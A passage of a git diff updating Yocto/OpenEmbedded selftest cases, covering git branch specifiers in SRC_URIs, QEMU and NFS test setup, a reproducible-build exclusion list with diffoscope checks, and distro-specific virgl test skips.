-        addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git"']
+        addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master"']
         srcurilines = src_uri.split()
         srcurilines[0] = 'SRC_URI = "' + srcurilines[0]
         srcurilines.append('"')
@@ -1285,7 +1331,7 @@ class DevtoolExtractTests(DevtoolBase):
             # Now really test deploy-target
             result = runCmd('devtool deploy-target -c %s root@%s' % (testrecipe, qemu.ip))
             # Run a test command to see if it was installed properly
-            sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+            sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o HostKeyAlgorithms=+ssh-rsa'
             result = runCmd('ssh %s root@%s %s' % (sshargs, qemu.ip, testcommand))
             # Check if it deployed all of the files with the right ownership/perms
             # First look on the host - need to do this under pseudo to get the correct ownership/perms
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
new file mode 100644
index 0000000000..f70f10e4db
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
@@ -0,0 +1 @@
+A
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
new file mode 100644
index 0000000000..223b7836fb
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
@@ -0,0 +1 @@
+B
diff --git a/meta/lib/oeqa/selftest/cases/distrodata.py b/meta/lib/oeqa/selftest/cases/distrodata.py
index e1cfc3b621..8e5e24db3d 100644
--- a/meta/lib/oeqa/selftest/cases/distrodata.py
+++ b/meta/lib/oeqa/selftest/cases/distrodata.py
@@ -63,7 +63,7 @@ but their recipes claim otherwise by setting UPSTREAM_VERSION_UNKNOWN. Please re
                      return True
             return False
 
-        feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\n'
+        feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\nPACKAGE_CLASSES = "package_ipk package_deb package_rpm"\n'
         self.write_config(feature)
 
         with bb.tinfoil.Tinfoil() as tinfoil:
diff --git a/meta/lib/oeqa/selftest/cases/glibc.py b/meta/lib/oeqa/selftest/cases/glibc.py
index c687f6ef93..c1f6e4c1fb 100644
--- a/meta/lib/oeqa/selftest/cases/glibc.py
+++ b/meta/lib/oeqa/selftest/cases/glibc.py
@@ -33,7 +33,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
 
         ptestsuite = "glibc-user" if ssh is None else "glibc"
         self.ptest_section(ptestsuite)
-        with open(os.path.join(builddir, "tests.sum"), "r") as f:
+        with open(os.path.join(builddir, "tests.sum"), "r",  errors='replace') as f:
             for test, result in parse_values(f):
                 self.ptest_result(ptestsuite, test, result)
 
@@ -41,7 +41,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
         with contextlib.ExitStack() as s:
             # use the base work dir, as the nfs mount, since the recipe directory may not exist
             tmpdir = get_bb_var("BASE_WORKDIR")
-            nfsport, mountport = s.enter_context(unfs_server(tmpdir))
+            nfsport, mountport = s.enter_context(unfs_server(tmpdir, udp = False))
 
             # build core-image-minimal with required packages
             default_installed_packages = [
@@ -61,7 +61,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
             bitbake("core-image-minimal")
 
             # start runqemu
-            qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic"))
+            qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic", qemuparams = "-m 1024"))
 
             # validate that SSH is working
             status, _ = qemu.run("uname")
@@ -70,7 +70,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
             # setup nfs mount
             if qemu.run("mkdir -p \"{0}\"".format(tmpdir))[0] != 0:
                 raise Exception("Failed to setup NFS mount directory on target")
-            mountcmd = "mount -o noac,nfsvers=3,port={0},udp,mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir)
+            mountcmd = "mount -o noac,nfsvers=3,port={0},mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir)
             status, output = qemu.run(mountcmd)
             if status != 0:
                 raise Exception("Failed to setup NFS mount on target ({})".format(repr(output)))
diff --git a/meta/lib/oeqa/selftest/cases/gotoolchain.py b/meta/lib/oeqa/selftest/cases/gotoolchain.py
index 3119520f0d..59f80aad28 100644
--- a/meta/lib/oeqa/selftest/cases/gotoolchain.py
+++ b/meta/lib/oeqa/selftest/cases/gotoolchain.py
@@ -43,6 +43,12 @@ class oeGoToolchainSelfTest(OESelftestTestCase):
 
     @classmethod
     def tearDownClass(cls):
+        # Go creates file which are readonly
+        for dirpath, dirnames, filenames in os.walk(cls.tmpdir_SDKQA):
+            for filename in filenames + dirnames:
+                f = os.path.join(dirpath, filename)
+                if not os.path.islink(f):
+                    os.chmod(f, 0o775)
         shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True)
         super(oeGoToolchainSelfTest, cls).tearDownClass()
 
diff --git a/meta/lib/oeqa/selftest/cases/imagefeatures.py b/meta/lib/oeqa/selftest/cases/imagefeatures.py
index 2b9c4998f7..535d80cb86 100644
--- a/meta/lib/oeqa/selftest/cases/imagefeatures.py
+++ b/meta/lib/oeqa/selftest/cases/imagefeatures.py
@@ -240,7 +240,7 @@ USERADD_GID_TABLES += "files/static-group"
     def test_no_busybox_base_utils(self):
         config = """
 # Enable x11
-DISTRO_FEATURES_append += "x11"
+DISTRO_FEATURES_append = " x11"
 
 # Switch to systemd
 DISTRO_FEATURES += "systemd"
diff --git a/meta/lib/oeqa/selftest/cases/oelib/elf.py b/meta/lib/oeqa/selftest/cases/oelib/elf.py
index d0a28090f2..5a5f9b4fdf 100644
--- a/meta/lib/oeqa/selftest/cases/oelib/elf.py
+++ b/meta/lib/oeqa/selftest/cases/oelib/elf.py
@@ -21,6 +21,6 @@ class TestElf(TestCase):
         self.assertEqual(oe.qa.elf_machine_to_string(0xB7), "AArch64")
         self.assertEqual(oe.qa.elf_machine_to_string(0xF7), "BPF")
 
-        self.assertEqual(oe.qa.elf_machine_to_string(0x00), "Unknown (0)")
+        self.assertEqual(oe.qa.elf_machine_to_string(0x00), "Unset")
         self.assertEqual(oe.qa.elf_machine_to_string(0xDEADBEEF), "Unknown (3735928559)")
         self.assertEqual(oe.qa.elf_machine_to_string("foobar"), "Unknown ('foobar')")
diff --git a/meta/lib/oeqa/selftest/cases/oelib/utils.py b/meta/lib/oeqa/selftest/cases/oelib/utils.py
index a7214beb4c..bbf67bf9c9 100644
--- a/meta/lib/oeqa/selftest/cases/oelib/utils.py
+++ b/meta/lib/oeqa/selftest/cases/oelib/utils.py
@@ -64,7 +64,7 @@ class TestMultiprocessLaunch(TestCase):
         import bb
 
         def testfunction(item, d):
-            if item == "2" or item == "1":
+            if item == "2":
                 raise KeyError("Invalid number %s" % item)
             return "Found %s" % item
 
@@ -99,5 +99,4 @@ class TestMultiprocessLaunch(TestCase):
         # Assert the function prints exceptions
         with captured_output() as (out, err):
             self.assertRaises(bb.BBHandledException, multiprocess_launch, testfunction, ["1", "2", "3", "4", "5", "6"], d, extraargs=(d,))
-        self.assertIn("KeyError: 'Invalid number 1'", out.getvalue())
         self.assertIn("KeyError: 'Invalid number 2'", out.getvalue())
diff --git a/meta/lib/oeqa/selftest/cases/oescripts.py b/meta/lib/oeqa/selftest/cases/oescripts.py
index 726daff7c6..fb99be447e 100644
--- a/meta/lib/oeqa/selftest/cases/oescripts.py
+++ b/meta/lib/oeqa/selftest/cases/oescripts.py
@@ -133,7 +133,8 @@ class OEListPackageconfigTests(OEScriptTests):
     def check_endlines(self, results,  expected_endlines): 
         for line in results.output.splitlines():
             for el in expected_endlines:
-                if line.split() == el.split():
+                if line and line.split()[0] == el.split()[0] and \
+                   ' '.join(sorted(el.split())) in ' '.join(sorted(line.split())):
                     expected_endlines.remove(el)
                     break
 
diff --git a/meta/lib/oeqa/selftest/cases/pkgdata.py b/meta/lib/oeqa/selftest/cases/pkgdata.py
index 833a1803ba..254abc40c6 100644
--- a/meta/lib/oeqa/selftest/cases/pkgdata.py
+++ b/meta/lib/oeqa/selftest/cases/pkgdata.py
@@ -218,3 +218,9 @@ class OePkgdataUtilTests(OESelftestTestCase):
     def test_specify_pkgdatadir(self):
         result = runCmd('oe-pkgdata-util -p %s lookup-pkg zlib' % get_bb_var('PKGDATA_DIR'))
         self.assertEqual(result.output, 'libz1')
+
+    def test_no_param(self):
+        result = runCmd('oe-pkgdata-util', ignore_status=True)
+        self.assertEqual(result.status, 2, "Status different than 2. output: %s" % result.output)
+        currpos = result.output.find('usage: oe-pkgdata-util')
+        self.assertTrue(currpos != -1, msg = "Test is Failed. Help is not Displayed in %s" % result.output)
diff --git a/meta/lib/oeqa/selftest/cases/prservice.py b/meta/lib/oeqa/selftest/cases/prservice.py
index 85b534963d..fdc1e40058 100644
--- a/meta/lib/oeqa/selftest/cases/prservice.py
+++ b/meta/lib/oeqa/selftest/cases/prservice.py
@@ -23,7 +23,7 @@ class BitbakePrTests(OESelftestTestCase):
         package_data_file = os.path.join(self.pkgdata_dir, 'runtime', package_name)
         package_data = ftools.read_file(package_data_file)
         find_pr = re.search(r"PKGR: r[0-9]+\.([0-9]+)", package_data)
-        self.assertTrue(find_pr, "No PKG revision found in %s" % package_data_file)
+        self.assertTrue(find_pr, "No PKG revision found via regex 'PKGR: r[0-9]+\.([0-9]+)' in %s" % package_data_file)
         return int(find_pr.group(1))
 
     def get_task_stamp(self, package_name, recipe_task):
@@ -40,7 +40,7 @@ class BitbakePrTests(OESelftestTestCase):
         return str(stamps[0])
 
     def increment_package_pr(self, package_name):
-        inc_data = "do_package_append() {\n    bb.build.exec_func('do_test_prserv', d)\n}\ndo_test_prserv() {\necho \"The current date is: %s\"\n}" % datetime.datetime.now()
+        inc_data = "do_package_append() {\n    bb.build.exec_func('do_test_prserv', d)\n}\ndo_test_prserv() {\necho \"The current date is: %s\" > ${PKGDESTWORK}/${PN}.datestamp\n}" % datetime.datetime.now()
         self.write_recipeinc(package_name, inc_data)
         res = bitbake(package_name, ignore_status=True)
         self.delete_recipeinc(package_name)
@@ -63,7 +63,7 @@ class BitbakePrTests(OESelftestTestCase):
         pr_2 = self.get_pr_version(package_name)
         stamp_2 = self.get_task_stamp(package_name, track_task)
 
-        self.assertTrue(pr_2 - pr_1 == 1, "Step between pkg revisions is not 1 (was %s - %s)" % (pr_2, pr_1))
+        self.assertTrue(pr_2 - pr_1 == 1, "New PR %s did not increment as expected (from %s), difference should be 1" % (pr_2, pr_1))
         self.assertTrue(stamp_1 != stamp_2, "Different pkg rev. but same stamp: %s" % stamp_1)
 
     def run_test_pr_export_import(self, package_name, replace_current_db=True):
@@ -75,7 +75,7 @@ class BitbakePrTests(OESelftestTestCase):
         exported_db_path = os.path.join(self.builddir, 'export.inc')
         export_result = runCmd("bitbake-prserv-tool export %s" % exported_db_path, ignore_status=True)
         self.assertEqual(export_result.status, 0, msg="PR Service database export failed: %s" % export_result.output)
-        self.assertTrue(os.path.exists(exported_db_path))
+        self.assertTrue(os.path.exists(exported_db_path), msg="%s didn't exist, tool output %s" % (exported_db_path, export_result.output))
 
         if replace_current_db:
             current_db_path = os.path.join(get_bb_var('PERSISTENT_DIR'), 'prserv.sqlite3')
@@ -89,7 +89,7 @@ class BitbakePrTests(OESelftestTestCase):
         self.increment_package_pr(package_name)
         pr_2 = self.get_pr_version(package_name)
 
-        self.assertTrue(pr_2 - pr_1 == 1, "Step between pkg revisions is not 1 (was %s - %s)" % (pr_2, pr_1))
+        self.assertTrue(pr_2 - pr_1 == 1, "New PR %s did not increment as expected (from %s), difference should be 1" % (pr_2, pr_1))
 
     def test_import_export_replace_db(self):
         self.run_test_pr_export_import('m4')
diff --git a/meta/lib/oeqa/selftest/cases/pseudo.py b/meta/lib/oeqa/selftest/cases/pseudo.py
new file mode 100644
index 0000000000..33593d5ce9
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/pseudo.py
@@ -0,0 +1,27 @@
+#
+# SPDX-License-Identifier: MIT
+#
+
+import glob
+import os
+import shutil
+from oeqa.utils.commands import bitbake, get_test_layer
+from oeqa.selftest.case import OESelftestTestCase
+
+class Pseudo(OESelftestTestCase):
+
+    def test_pseudo_pyc_creation(self):
+        self.write_config("")
+
+        metaselftestpath = get_test_layer()
+        pycache_path = os.path.join(metaselftestpath, 'lib/__pycache__')
+        if os.path.exists(pycache_path):
+            shutil.rmtree(pycache_path)
+
+        bitbake('pseudo-pyc-test -c install')
+
+        test1_pyc_present = len(glob.glob(os.path.join(pycache_path, 'pseudo_pyc_test1.*.pyc')))
+        self.assertTrue(test1_pyc_present, 'test1 pyc file missing, should be created outside of pseudo context.')
+
+        test2_pyc_present = len(glob.glob(os.path.join(pycache_path, 'pseudo_pyc_test2.*.pyc')))
+        self.assertFalse(test2_pyc_present, 'test2 pyc file present, should not be created in pseudo context.')
diff --git a/meta/lib/oeqa/selftest/cases/recipetool.py b/meta/lib/oeqa/selftest/cases/recipetool.py
index c2ade2543a..e8aeea3023 100644
--- a/meta/lib/oeqa/selftest/cases/recipetool.py
+++ b/meta/lib/oeqa/selftest/cases/recipetool.py
@@ -370,7 +370,7 @@ class RecipetoolTests(RecipetoolBase):
         tempsrc = os.path.join(self.tempdir, 'srctree')
         os.makedirs(tempsrc)
         recipefile = os.path.join(self.tempdir, 'libmatchbox.bb')
-        srcuri = 'git://git.yoctoproject.org/libmatchbox'
+        srcuri = 'git://git.yoctoproject.org/libmatchbox;branch=master'
         result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc])
         self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
         checkvars = {}
@@ -456,7 +456,7 @@ class RecipetoolTests(RecipetoolBase):
         self.assertTrue(os.path.isfile(recipefile))
         checkvars = {}
         checkvars['LICENSE'] = set(['Apache-2.0'])
-        checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https'
+        checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https;branch=master'
         inherits = ['setuptools3']
         self._test_recipe_contents(recipefile, checkvars, inherits)
 
@@ -523,7 +523,7 @@ class RecipetoolTests(RecipetoolBase):
         self.assertTrue(os.path.isfile(recipefile))
         checkvars = {}
         checkvars['LICENSE'] = set(['GPLv2'])
-        checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http'
+        checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http;branch=master'
         inherits = ['pkgconfig', 'autotools']
         self._test_recipe_contents(recipefile, checkvars, inherits)
 
diff --git a/meta/lib/oeqa/selftest/cases/reproducible.py b/meta/lib/oeqa/selftest/cases/reproducible.py
index 5d3959be77..be4cdcc429 100644
--- a/meta/lib/oeqa/selftest/cases/reproducible.py
+++ b/meta/lib/oeqa/selftest/cases/reproducible.py
@@ -17,6 +17,57 @@ import stat
 import os
 import datetime
 
+# For sample packages, see:
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-0t7wr_oo/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-4s9ejwyp/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-haiwdlbr/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-hwds3mcl/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201203-sua0pzvc/
+# (both packages/ and packages-excluded/)
+exclude_packages = [
+	'acpica-src',
+	'babeltrace2-ptest',
+	'bind',
+	'bootchart2-doc',
+	'epiphany',
+	'gcr',
+	'glide',
+	'go-dep',
+	'go-helloworld',
+	'go-runtime',
+	'go_',
+	'gstreamer1.0-python',
+	'hwlatdetect',
+        'kernel-devsrc',
+	'libcap-ng',
+	'libjson',
+	'libproxy',
+	'lttng-tools-dbg',
+	'lttng-tools-ptest',
+	'ltp',
+	'ovmf-shell-efi',
+	'parted-ptest',
+	'perf',
+	'piglit',
+	'pybootchartgui',
+	'qemu',
+	'quilt-ptest',
+	'rsync',
+	'ruby',
+	'stress-ng',
+	'systemd-bootchart',
+	'systemtap',
+	'valgrind-ptest',
+	'webkitgtk',
+	]
+
+def is_excluded(package):
+    package_name = os.path.basename(package)
+    for i in exclude_packages:
+        if package_name.startswith(i):
+            return i
+    return None
+
 MISSING = 'MISSING'
 DIFFERENT = 'DIFFERENT'
 SAME = 'SAME'
@@ -39,14 +90,21 @@ class PackageCompareResults(object):
         self.total = []
         self.missing = []
         self.different = []
+        self.different_excluded = []
         self.same = []
+        self.active_exclusions = set()
 
     def add_result(self, r):
         self.total.append(r)
         if r.status == MISSING:
             self.missing.append(r)
         elif r.status == DIFFERENT:
-            self.different.append(r)
+            exclusion = is_excluded(r.reference)
+            if exclusion:
+                self.different_excluded.append(r)
+                self.active_exclusions.add(exclusion)
+            else:
+                self.different.append(r)
         else:
             self.same.append(r)
 
@@ -54,10 +112,14 @@ class PackageCompareResults(object):
         self.total.sort()
         self.missing.sort()
         self.different.sort()
+        self.different_excluded.sort()
         self.same.sort()
 
     def __str__(self):
-        return 'same=%i different=%i missing=%i total=%i' % (len(self.same), len(self.different), len(self.missing), len(self.total))
+        return 'same=%i different=%i different_excluded=%i missing=%i total=%i\nunused_exclusions=%s' % (len(self.same), len(self.different), len(self.different_excluded), len(self.missing), len(self.total), self.unused_exclusions())
+
+    def unused_exclusions(self):
+        return sorted(set(exclude_packages) - self.active_exclusions)
 
 def compare_file(reference, test, diffutils_sysroot):
     result = CompareResult()
@@ -68,7 +130,7 @@ def compare_file(reference, test, diffutils_sysroot):
         result.status = MISSING
         return result
 
-    r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True)
+    r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True, sync=False)
 
     if r.status:
         result.status = DIFFERENT
@@ -77,9 +139,41 @@ def compare_file(reference, test, diffutils_sysroot):
     result.status = SAME
     return result
 
+def run_diffoscope(a_dir, b_dir, html_dir, **kwargs):
+    return runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', 'yes', '--html-dir', html_dir, a_dir, b_dir],
+                **kwargs)
+
+class DiffoscopeTests(OESelftestTestCase):
+    diffoscope_test_files = os.path.join(os.path.dirname(os.path.abspath(__file__)), "diffoscope")
+
+    def test_diffoscope(self):
+        bitbake("diffoscope-native -c addto_recipe_sysroot")
+        diffoscope_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "diffoscope-native")
+
+        # Check that diffoscope doesn't return an error when the files compare
+        # the same (a general check that diffoscope is working)
+        with tempfile.TemporaryDirectory() as tmpdir:
+            run_diffoscope('A', 'A', tmpdir,
+                native_sysroot=diffoscope_sysroot, cwd=self.diffoscope_test_files)
+
+        # Check that diffoscope generates an index.html file when the files are
+        # different
+        with tempfile.TemporaryDirectory() as tmpdir:
+            r = run_diffoscope('A', 'B', tmpdir,
+                native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=self.diffoscope_test_files)
+
+            self.assertNotEqual(r.status, 0, msg="diffoscope was successful when an error was expected")
+            self.assertTrue(os.path.exists(os.path.join(tmpdir, 'index.html')), "HTML index not found!")
+
 class ReproducibleTests(OESelftestTestCase):
+    # Test the reproducibility of whatever is built between sstate_targets and targets
+
     package_classes = ['deb', 'ipk']
-    images = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline']
+
+    # targets are the things we want to test the reproducibility of
+    targets = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline', 'world']
+    # sstate targets are things to pull from sstate to potentially cut build/debugging time
+    sstate_targets = []
     save_results = False
     if 'OEQA_DEBUGGING_SAVED_OUTPUT' in os.environ:
         save_results = os.environ['OEQA_DEBUGGING_SAVED_OUTPUT']
@@ -94,7 +188,7 @@ class ReproducibleTests(OESelftestTestCase):
 
     def setUpLocal(self):
         super().setUpLocal()
-        needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS']
+        needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS', 'BB_HASHSERVE']
         bb_vars = get_bb_vars(needed_vars)
         for v in needed_vars:
             setattr(self, v.lower(), bb_vars[v])
@@ -150,20 +244,29 @@ class ReproducibleTests(OESelftestTestCase):
             PACKAGE_CLASSES = "{package_classes}"
             INHIBIT_PACKAGE_STRIP = "1"
             TMPDIR = "{tmpdir}"
+            LICENSE_FLAGS_WHITELIST = "commercial"
+            DISTRO_FEATURES_append = ' systemd pam'
             ''').format(package_classes=' '.join('package_%s' % c for c in self.package_classes),
                         tmpdir=tmpdir)
 
         if not use_sstate:
+            if self.sstate_targets:
+               self.logger.info("Building prebuild for %s (sstate allowed)..." % (name))
+               self.write_config(config)
+               bitbake(' '.join(self.sstate_targets))
+
             # This config fragment will disable using shared and the sstate
             # mirror, forcing a complete build from scratch
             config += textwrap.dedent('''\
                 SSTATE_DIR = "${TMPDIR}/sstate"
-                SSTATE_MIRROR = ""
+                SSTATE_MIRRORS = "file://.*/.*-native.*  http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH file://.*/.*-cross.*  http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
                 ''')
 
+        self.logger.info("Building %s (sstate%s allowed)..." % (name, '' if use_sstate else ' NOT'))
         self.write_config(config)
         d = get_bb_vars(capture_vars)
-        bitbake(' '.join(self.images))
+        # targets used to be called images
+        bitbake(' '.join(getattr(self, 'images', self.targets)))
         return d
 
     def test_reproducible_builds(self):
@@ -187,6 +290,7 @@ class ReproducibleTests(OESelftestTestCase):
             self.logger.info('Non-reproducible packages will be copied to %s', save_dir)
 
         vars_A = self.do_test_build('reproducibleA', self.build_from_sstate)
+
         vars_B = self.do_test_build('reproducibleB', False)
 
         # NOTE: The temp directories from the reproducible build are purposely
@@ -201,6 +305,7 @@ class ReproducibleTests(OESelftestTestCase):
                 deploy_A = vars_A['DEPLOY_DIR_' + c.upper()]
                 deploy_B = vars_B['DEPLOY_DIR_' + c.upper()]
 
+                self.logger.info('Checking %s packages for differences...' % c)
                 result = self.compare_packages(deploy_A, deploy_B, diffutils_sysroot)
 
                 self.logger.info('Reproducibility summary for %s: %s' % (c, result))
@@ -209,6 +314,7 @@ class ReproducibleTests(OESelftestTestCase):
 
                 self.write_package_list(package_class, 'missing', result.missing)
                 self.write_package_list(package_class, 'different', result.different)
+                self.write_package_list(package_class, 'different_excluded', result.different_excluded)
                 self.write_package_list(package_class, 'same', result.same)
 
                 if self.save_results:
@@ -216,8 +322,12 @@ class ReproducibleTests(OESelftestTestCase):
                         self.copy_file(d.reference, '/'.join([save_dir, 'packages', strip_topdir(d.reference)]))
                         self.copy_file(d.test, '/'.join([save_dir, 'packages', strip_topdir(d.test)]))
 
+                    for d in result.different_excluded:
+                        self.copy_file(d.reference, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.reference)]))
+                        self.copy_file(d.test, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.test)]))
+
                 if result.missing or result.different:
-                    fails.append("The following %s packages are missing or different: %s" %
+                    fails.append("The following %s packages are missing or different and not in exclusion list: %s" %
                             (c, '\n'.join(r.test for r in (result.missing + result.different))))
 
         # Clean up empty directories
@@ -232,7 +342,7 @@ class ReproducibleTests(OESelftestTestCase):
                 # Copy jquery to improve the diffoscope output usability
                 self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js'))
 
-                runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', '--html-dir', package_html_dir, 'reproducibleA', 'reproducibleB'],
+                run_diffoscope('reproducibleA', 'reproducibleB', package_html_dir,
                         native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir)
 
         if fails:
diff --git a/meta/lib/oeqa/selftest/cases/runcmd.py b/meta/lib/oeqa/selftest/cases/runcmd.py
index fa6113d7fa..e9612389fe 100644
--- a/meta/lib/oeqa/selftest/cases/runcmd.py
+++ b/meta/lib/oeqa/selftest/cases/runcmd.py
@@ -27,8 +27,8 @@ class RunCmdTests(OESelftestTestCase):
 
     # The delta is intentionally smaller than the timeout, to detect cases where
     # we incorrectly apply the timeout more than once.
-    TIMEOUT = 5
-    DELTA = 3
+    TIMEOUT = 10
+    DELTA = 8
 
     def test_result_okay(self):
         result = runCmd("true")
diff --git a/meta/lib/oeqa/selftest/cases/runqemu.py b/meta/lib/oeqa/selftest/cases/runqemu.py
index 7e676bcb41..da22f77b27 100644
--- a/meta/lib/oeqa/selftest/cases/runqemu.py
+++ b/meta/lib/oeqa/selftest/cases/runqemu.py
@@ -163,12 +163,11 @@ class QemuTest(OESelftestTestCase):
         bitbake(cls.recipe)
 
     def _start_qemu_shutdown_check_if_shutdown_succeeded(self, qemu, timeout):
+        # Allow the runner's LoggingThread instance to exit without errors
+        # (such as the exception "Console connection closed unexpectedly")
+        # as qemu will disappear when we shut it down
+        qemu.runner.allowexit()
         qemu.run_serial("shutdown -h now")
-        # Stop thread will stop the LoggingThread instance used for logging
-        # qemu through serial console, stop thread will prevent this code
-        # from facing exception (Console connection closed unexpectedly)
-        # when qemu was shutdown by the above shutdown command
-        qemu.runner.stop_thread()
         time_track = 0
         try:
             while True:
diff --git a/meta/lib/oeqa/selftest/cases/runtime_test.py b/meta/lib/oeqa/selftest/cases/runtime_test.py
index cd03069340..cc4190c1d6 100644
--- a/meta/lib/oeqa/selftest/cases/runtime_test.py
+++ b/meta/lib/oeqa/selftest/cases/runtime_test.py
@@ -14,11 +14,6 @@ from oeqa.core.decorator.data import skipIfNotQemu
 
 class TestExport(OESelftestTestCase):
 
-    @classmethod
-    def tearDownClass(cls):
-        runCmd("rm -rf /tmp/sdk")
-        super(TestExport, cls).tearDownClass()
-
     def test_testexport_basic(self):
         """
         Summary: Check basic testexport functionality with only ping test enabled.
@@ -95,19 +90,20 @@ class TestExport(OESelftestTestCase):
         msg = "Couldn't find SDK tarball: %s" % tarball_path
         self.assertEqual(os.path.isfile(tarball_path), True, msg)
 
-        # Extract SDK and run tar from SDK
-        result = runCmd("%s -y -d /tmp/sdk" % tarball_path)
-        self.assertEqual(0, result.status, "Couldn't extract SDK")
+        with tempfile.TemporaryDirectory() as tmpdirname:
+            # Extract SDK and run tar from SDK
+            result = runCmd("%s -y -d %s" % (tarball_path, tmpdirname))
+            self.assertEqual(0, result.status, "Couldn't extract SDK")
 
-        env_script = result.output.split()[-1]
-        result = runCmd(". %s; which tar" % env_script, shell=True)
-        self.assertEqual(0, result.status, "Couldn't setup SDK environment")
-        is_sdk_tar = True if "/tmp/sdk" in result.output else False
-        self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
+            env_script = result.output.split()[-1]
+            result = runCmd(". %s; which tar" % env_script, shell=True)
+            self.assertEqual(0, result.status, "Couldn't setup SDK environment")
+            is_sdk_tar = True if tmpdirname in result.output else False
+            self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
 
-        tar_sdk = result.output
-        result = runCmd("%s --version" % tar_sdk)
-        self.assertEqual(0, result.status, "Couldn't run tar from SDK")
+            tar_sdk = result.output
+            result = runCmd("%s --version" % tar_sdk)
+            self.assertEqual(0, result.status, "Couldn't run tar from SDK")
 
 
 class TestImage(OESelftestTestCase):
@@ -161,6 +157,7 @@ class TestImage(OESelftestTestCase):
         features += 'PACKAGE_FEED_GPG_NAME = "testuser"\n'
         features += 'PACKAGE_FEED_GPG_PASSPHRASE_FILE = "%s"\n' % os.path.join(signing_key_dir, 'key.passphrase')
         features += 'GPG_PATH = "%s"\n' % self.gpg_home
+        features += 'PSEUDO_IGNORE_PATHS .= ",%s"\n' % self.gpg_home
         self.write_config(features)
 
         # Build core-image-sato and testimage
@@ -178,12 +175,24 @@ class TestImage(OESelftestTestCase):
         if "DISPLAY" not in os.environ:
             self.skipTest("virgl gtk test must be run inside a X session")
         distro = oe.lsb.distro_identifier()
+        if distro and distro.startswith('almalinux'):
+            self.skipTest('virgl isn\'t working with Alma Linux')
+        if distro and distro.startswith('rocky'):
+            self.skipTest('virgl isn\'t working with Rocky Linux')
         if distro and distro == 'debian-8':
             self.skipTest('virgl isn\'t working with Debian 8')
         if distro and distro == 'centos-7':
             self.skipTest('virgl isn\'t working with Centos 7')
+        if distro and distro == 'centos-8':
+            self.skipTest('virgl isn\'t working with Centos 8')
+        if distro and distro.startswith('fedora'):
+            self.skipTest('virgl isn\'t working with Fedora')
         if distro and distro == 'opensuseleap-15.0':
             self.skipTest('virgl isn\'t working with Opensuse 15.0')
+        if distro and distro == 'ubuntu-22.04':
+            self.skipTest('virgl isn\'t working with Ubuntu 22.04')
+        if distro and distro == 'ubuntu-22.10':
+            self.skipTest('virgl isn\'t working with Ubuntu 22.10')
 
         qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
         sdl_packageconfig = get_bb_var('PACKAGECONFIG', 'libsdl2-native')
@@ -219,6 +228,7 @@ class TestImage(OESelftestTestCase):
         Author: Alexander Kanavin <alex.kanavin@gmail.com>
         """
         import subprocess, os
+        self.skipTest("Crashes in mesa observed with this test on dunfell: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14527")
         try:
